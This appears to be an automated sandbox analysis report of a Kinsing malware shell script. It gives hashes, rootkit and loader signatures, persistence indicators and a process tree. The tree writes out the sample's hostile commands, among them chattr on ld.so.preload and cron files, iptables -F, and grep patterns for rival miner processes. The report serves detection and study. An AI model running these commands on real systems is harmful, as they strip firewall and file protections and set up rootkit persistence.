Analysis
-
max time kernel
83s -
max time network
106s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240418-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
24/02/2025, 03:15
Static task
static1
Behavioral task
behavioral1
Sample
7f65f1d3cc38298c0b27c6f307b51a578619a16f12d3e8c662c3b7e290d08ebe.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
7f65f1d3cc38298c0b27c6f307b51a578619a16f12d3e8c662c3b7e290d08ebe.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
7f65f1d3cc38298c0b27c6f307b51a578619a16f12d3e8c662c3b7e290d08ebe.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
7f65f1d3cc38298c0b27c6f307b51a578619a16f12d3e8c662c3b7e290d08ebe.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
7f65f1d3cc38298c0b27c6f307b51a578619a16f12d3e8c662c3b7e290d08ebe.sh
-
Size
15KB
-
MD5
34ac9486a95651a465a5fc6039c2819a
-
SHA1
274290fc9187e8f3504aec78ea1ef8984b5099d3
-
SHA256
7f65f1d3cc38298c0b27c6f307b51a578619a16f12d3e8c662c3b7e290d08ebe
-
SHA512
9c886b2976fc624ada4d5ed34f662a7aff682bae4bb4f37a519d50bd94ef019924a96aeb4b84fbee3136114e4f8d6ce5626d40b123622f3ceeb06de9969b9409
-
SSDEEP
384:r5JxgzLuqlH2wx2vUaQa5/eN86704s80ooJQYgykWT4yCtvUsDjdWOoJwN:trgXux7YJDj8OoJwN
Malware Config
Signatures
-
Kinsing Rootkit
Rootkit reuses the publicly available BEURK rootkit.
-
Kinsing Rootkit payload 1 IoCs
resource yara_rule behavioral3/files/fstream-17.dat family_elf_kinsing_rootkit -
Kinsing family
-
Kinsing payload 1 IoCs
resource yara_rule behavioral3/files/fstream-16.dat family_elf_kinsing_loader -
Kinsing_rootkit family
-
Modifies the dynamic linker configuration file 2 TTPs 1 IoCs
Malware can modify the configuration file of the dynamic linker to preload malicous libraries with every executed process.
description ioc Process File opened for modification /etc/ld.so.preload 7f65f1d3cc38298c0b27c6f307b51a578619a16f12d3e8c662c3b7e290d08ebe.sh -
File and Directory Permissions Modification 1 TTPs 8 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1740 chmod 1742 chmod 1748 chmod 1749 chmod 1722 chmod 1724 chmod 1733 chmod 1735 chmod -
Executes dropped EXE 1 IoCs
ioc pid Process /etc/data/kinsing 1750 7f65f1d3cc38298c0b27c6f307b51a578619a16f12d3e8c662c3b7e290d08ebe.sh -
Flushes firewall rules 1 TTPs 1 IoCs
Flushes/ disables firewall rules inside the Linux kernel.
pid Process 753 iptables -
Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs
Abuse sudo or cached sudo credentials to execute code.
pid Process 1470 sudo -
Attempts to change immutable files 50 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
pid Process 1672 xargs 1689 xargs 1529 xargs 1561 xargs 1627 xargs 1556 xargs 1628 sed 1634 sed 1549 xargs 1652 sed 1660 xargs 1677 xargs 739 chattr 1513 xargs 1534 xargs 1539 xargs 1639 xargs 1642 xargs 1648 xargs 1649 sed 1633 xargs 1508 xargs 1544 xargs 1568 xargs 1574 xargs 1592 xargs 1654 xargs 1658 sed 743 chattr 1479 uname 1580 xargs 1586 xargs 1636 xargs 1700 xargs 1711 xargs 1716 xargs 1503 xargs 1518 xargs 1624 xargs 1631 sed 1640 sed 1651 xargs 1655 sed 1657 xargs 750 chattr 1524 xargs 1625 sed 1630 xargs 1637 sed 1646 sed -
Creates/modifies Cron job 1 TTPs 64 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.i0fQQ0 crontab File opened for modification /var/spool/cron/crontabs/tmp.ZDAUUF crontab File opened for modification /var/spool/cron/crontabs/tmp.xRYrYU crontab File opened for modification /var/spool/cron/crontabs/tmp.o7H7P0 crontab File opened for modification /var/spool/cron/crontabs/tmp.S9Ge2n crontab File opened for modification /var/spool/cron/crontabs/tmp.zedwQm crontab File opened for modification /var/spool/cron/crontabs/tmp.3EHIwb crontab File opened for modification /var/spool/cron/crontabs/tmp.PdyZ0u crontab File opened for modification /var/spool/cron/crontabs/tmp.FQDvaw crontab File opened for modification /var/spool/cron/crontabs/tmp.S00ypF crontab File opened for modification /var/spool/cron/crontabs/tmp.PViE5t crontab File opened for modification /var/spool/cron/crontabs/tmp.I57ESU crontab File opened for modification /var/spool/cron/crontabs/tmp.BzyDBQ crontab File opened for modification /var/spool/cron/crontabs/tmp.8tcpGe crontab File opened for modification /var/spool/cron/crontabs/tmp.rV8skO crontab File opened for modification /var/spool/cron/crontabs/tmp.R0xdQa crontab File opened for modification /var/spool/cron/crontabs/tmp.y4LgrX crontab File opened for modification /var/spool/cron/crontabs/tmp.78IQdi crontab File opened for modification /var/spool/cron/crontabs/tmp.OBVqCJ crontab File opened for modification /var/spool/cron/crontabs/tmp.2FnULf crontab File opened for modification /var/spool/cron/crontabs/tmp.tJjK8f crontab File opened for modification /var/spool/cron/crontabs/tmp.hpsmSt crontab File opened for modification /var/spool/cron/crontabs/tmp.BgxWLu crontab File opened for modification /var/spool/cron/crontabs/tmp.ONmO7z crontab File opened for modification /var/spool/cron/crontabs/tmp.s9Aaul crontab File opened for modification /var/spool/cron/crontabs/tmp.IfMxEL crontab File opened for modification /var/spool/cron/crontabs/tmp.vCbd2T crontab File opened for modification /var/spool/cron/crontabs/tmp.aDlic1 crontab File opened for modification /var/spool/cron/crontabs/tmp.EzN79R crontab File opened for modification /var/spool/cron/crontabs/tmp.T5c43f crontab File opened for modification /var/spool/cron/crontabs/tmp.cC9v7C crontab File opened for modification /var/spool/cron/crontabs/tmp.ihsUWZ crontab File opened for modification /var/spool/cron/crontabs/tmp.TJnaWj crontab File opened for modification /var/spool/cron/crontabs/tmp.hpKXpg crontab File opened for modification /var/spool/cron/crontabs/tmp.09uWGA crontab File opened for modification /var/spool/cron/crontabs/tmp.RC5FSb crontab File opened for modification /var/spool/cron/crontabs/tmp.Cu5QuR crontab File opened for modification /var/spool/cron/crontabs/tmp.w7EiTX crontab File opened for modification /var/spool/cron/crontabs/tmp.LxqBqp crontab File opened for modification /var/spool/cron/crontabs/tmp.UL4SPQ crontab File opened for modification /var/spool/cron/crontabs/tmp.rdJhIh crontab File opened for modification /var/spool/cron/crontabs/tmp.ww4WFS crontab File opened for modification /var/spool/cron/crontabs/tmp.Nu5DVM crontab File opened for modification /var/spool/cron/crontabs/tmp.0wtUas crontab File opened for modification /var/spool/cron/crontabs/tmp.YdveTm crontab File opened for modification /var/spool/cron/crontabs/tmp.v6JGdm crontab File opened for modification /var/spool/cron/crontabs/tmp.6FD6XP crontab File opened for modification /var/spool/cron/crontabs/tmp.4KH9CY crontab File opened for modification /var/spool/cron/crontabs/tmp.lJG50d crontab File opened for modification /var/spool/cron/crontabs/tmp.hScDzt crontab File opened for modification /var/spool/cron/crontabs/tmp.EIrKjV crontab File opened for modification /var/spool/cron/crontabs/tmp.NCFfkB crontab File opened for modification /var/spool/cron/crontabs/tmp.JhQzps crontab File opened for modification /var/spool/cron/crontabs/tmp.FeZjW7 crontab File opened for modification /var/spool/cron/crontabs/tmp.T00CxO crontab File opened for modification /var/spool/cron/crontabs/tmp.nov0pi crontab File opened for modification /var/spool/cron/crontabs/tmp.TN9DoC crontab File opened for modification /var/spool/cron/crontabs/tmp.PXI3T8 crontab File opened for modification /var/spool/cron/crontabs/tmp.ewnU4G crontab File opened for modification /var/spool/cron/crontabs/tmp.tz50a4 crontab File opened for modification /var/spool/cron/crontabs/tmp.zAR89g crontab File opened for modification /var/spool/cron/crontabs/tmp.0igX4a crontab File opened for modification /var/spool/cron/crontabs/tmp.uh4IJg crontab File opened for modification /var/spool/cron/crontabs/tmp.LaHbEC crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Modifies systemd 2 TTPs 1 IoCs
Adds/ modifies systemd service files. Likely to achieve persistence.
description ioc Process File opened for modification /lib/systemd/system/bot.service 7f65f1d3cc38298c0b27c6f307b51a578619a16f12d3e8c662c3b7e290d08ebe.sh -
Reads CPU attributes 1 TTPs 64 IoCs
description ioc Process File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online exim4 File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online exim4 File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill -
Enumerates kernel/hardware configuration 1 TTPs 2 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
description ioc Process File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl -
Process Discovery 1 TTPs 12 IoCs
Adversaries may try to discover information about running processes.
pid Process 1520 ps 1525 ps 1535 ps 1540 ps 1552 ps 1620 ps 1668 ps 1673 ps 1530 ps 1545 ps 1557 ps 1712 ps -
description ioc Process File opened for reading /proc/381/cmdline pkill File opened for reading /proc/22/status pkill File opened for reading /proc/filesystems crontab File opened for reading /proc/6/cmdline pkill File opened for reading /proc/734/cmdline ps File opened for reading /proc/22/cmdline pkill File opened for reading /proc/21/stat ps File opened for reading /proc/24/cmdline pkill File opened for reading /proc/7/status ps File opened for reading /proc/1557/status ps File opened for reading /proc/362/status pkill File opened for reading /proc/677/status pkill File opened for reading /proc/420/cmdline pkill File opened for reading /proc/24/status pkill File opened for reading /proc/73/cmdline ps File opened for reading /proc/8/status ps File opened for reading /proc/13/stat ps File opened for reading /proc/73/cmdline ps File opened for reading /proc/17/status ps File opened for reading /proc/362/status pkill File opened for reading /proc/16/status ps File opened for reading /proc/filesystems sed File opened for reading /proc/18/cmdline pkill File opened for reading /proc/360/cmdline pkill File opened for reading /proc/19/status pkill File opened for reading /proc/681/cmdline pkill File opened for reading /proc/680/status pkill File opened for reading /proc/82/status pkill File opened for reading /proc/12/cmdline ps File opened for reading /proc/74/status pkill File opened for reading /proc/19/status pkill File opened for reading /proc/74/status pkill File opened for reading /proc/23/status ps File opened for reading /proc/1693/stat ps File opened for reading /proc/236/cmdline ps File opened for reading /proc/733/status pkill File opened for reading /proc/17/cmdline pkill File opened for reading /proc/72/status pkill File opened for reading /proc/1614/status pkill File opened for reading /proc/72/cmdline pkill File opened for reading /proc/70/cmdline pkill File opened for reading /proc/364/status pkill File opened for reading /proc/7/status pkill File opened for reading /proc/20/cmdline pkill File opened for reading /proc/332/cmdline pkill File opened for reading /proc/22/status pkill File opened for reading /proc/733/status pkill File opened for reading /proc/1/stat ps File opened for reading /proc/745/cmdline pkill File opened for reading /proc/1486/cmdline pkill File opened for reading /proc/36/cmdline ps File opened for reading /proc/1689/status ps File opened for reading /proc/81/status pkill File opened for reading /proc/81/cmdline pkill File opened for reading /proc/716/cmdline ps File opened for reading /proc/677/stat ps File opened for reading /proc/364/status pkill File opened for reading /proc/18/status pkill File opened for reading /proc/3/cmdline ps File opened for reading /proc/127/status pkill File opened for reading /proc/18/stat ps File opened for reading /proc/5/cmdline pkill File opened for reading /proc/175/cmdline pkill File opened for reading /proc/24/cmdline pkill -
System Network Configuration Discovery 1 TTPs 2 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1425 ls 1855 sed
Processes
-
/tmp/7f65f1d3cc38298c0b27c6f307b51a578619a16f12d3e8c662c3b7e290d08ebe.sh/tmp/7f65f1d3cc38298c0b27c6f307b51a578619a16f12d3e8c662c3b7e290d08ebe.sh1⤵
- Modifies the dynamic linker configuration file
- Executes dropped EXE
- Modifies systemd
PID:735 -
/usr/bin/chattrchattr -i /etc/ld.so.preload2⤵
- Attempts to change immutable files
PID:739
-
-
/bin/rmrm -f /etc/ld.so.preload2⤵PID:742
-
-
/usr/bin/chattrchattr -R -ia /var/spool/cron2⤵
- Attempts to change immutable files
PID:743
-
-
/usr/bin/chattrchattr -ia /etc/crontab2⤵
- Attempts to change immutable files
PID:750
-
-
/sbin/iptablesiptables -F2⤵
- Flushes firewall rules
PID:753
-
-
/bin/grepgrep exe2⤵PID:762
-
-
/bin/lsls -latrh /proc/12⤵PID:761
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:767
-
-
/bin/grepgrep exe2⤵PID:771
-
-
/bin/lsls -latrh /proc/102⤵PID:770
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:773
-
-
/bin/grepgrep exe2⤵PID:777
-
-
/bin/lsls -latrh /proc/112⤵PID:776
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:780
-
-
/bin/grepgrep exe2⤵PID:784
-
-
/bin/lsls -latrh /proc/1102⤵PID:783
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:788
-
-
/bin/grepgrep exe2⤵PID:791
-
-
/bin/lsls -latrh /proc/122⤵PID:790
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:794
-
-
/bin/grepgrep exe2⤵PID:797
-
-
/bin/lsls -latrh /proc/1262⤵PID:796
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:799
-
-
/bin/grepgrep exe2⤵PID:802
-
-
/bin/lsls -latrh /proc/1272⤵PID:801
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:805
-
-
/bin/grepgrep exe2⤵PID:808
-
-
/bin/lsls -latrh /proc/132⤵PID:807
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:810
-
-
/bin/grepgrep exe2⤵PID:813
-
-
/bin/lsls -latrh /proc/142⤵PID:812
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:815
-
-
/bin/grepgrep exe2⤵PID:818
-
-
/bin/lsls -latrh /proc/152⤵PID:817
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:820
-
-
/bin/grepgrep exe2⤵PID:823
-
-
/bin/lsls -latrh /proc/1532⤵PID:822
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:825
-
-
/bin/grepgrep exe2⤵PID:828
-
-
/bin/lsls -latrh /proc/162⤵PID:827
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:830
-
-
/bin/grepgrep exe2⤵PID:833
-
-
/bin/lsls -latrh /proc/1612⤵PID:832
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:835
-
-
/bin/grepgrep exe2⤵PID:838
-
-
/bin/lsls -latrh /proc/172⤵PID:837
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:840
-
-
/bin/grepgrep exe2⤵PID:843
-
-
/bin/lsls -latrh /proc/1752⤵PID:842
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:845
-
-
/bin/grepgrep exe2⤵PID:848
-
-
/bin/lsls -latrh /proc/182⤵PID:847
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:850
-
-
/bin/grepgrep exe2⤵PID:853
-
-
/bin/lsls -latrh /proc/192⤵PID:852
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:855
-
-
/bin/grepgrep exe2⤵PID:858
-
-
/bin/lsls -latrh /proc/22⤵PID:857
-
-
